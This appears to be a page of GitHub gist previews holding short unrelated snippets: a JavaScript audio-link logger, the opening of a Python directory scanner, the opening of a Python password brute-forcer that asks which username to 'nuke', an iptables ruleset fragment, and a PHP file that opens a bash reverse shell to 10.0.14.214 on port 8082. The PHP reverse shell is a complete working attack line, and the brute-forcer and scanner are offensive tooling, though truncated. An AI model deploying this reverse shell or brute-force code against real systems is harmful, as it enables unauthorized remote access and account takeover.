This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | audiotags = document.getElementsByTagName("audio"); | |
| for (i in audiotags) { | |
| if (!isNaN(i)) {console.log("link: " + audiotags.item(i).src);} | |
| } | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #!/usr/bin/env python3 | |
| import requests, argparse | |
| # get and parse arguments w/ argparse | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("-u", "--url", help = "specify URL to scan") | |
| parser.add_argument("-w", "--wordlist", help = "specify wordlist for use in scanner") | |
| parser.add_argument("-v", "--verbose", help = "use 1 to enable verbose mode, which is basically just throwing you all status codes") | |
| args = parser.parse_args() | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #!/usr/bin/env python3 | |
| import requests | |
| username = input("what username should we nuke? ") | |
| hacked = False | |
| password = 2800 | |
| while hacked == False: | |
| password += 1 | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | *filter | |
| # Allow all loopback (lo0) traffic and reject traffic | |
| # to localhost that does not originate from lo0. | |
| -A INPUT -i lo -j ACCEPT | |
| -A INPUT ! -i lo -s 127.0.0.0/8 -j REJECT | |
| # Allow ping. | |
| -A INPUT -p icmp -m state --state NEW --icmp-type 8 -j ACCEPT | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.14.214/8082 0>&1'"); |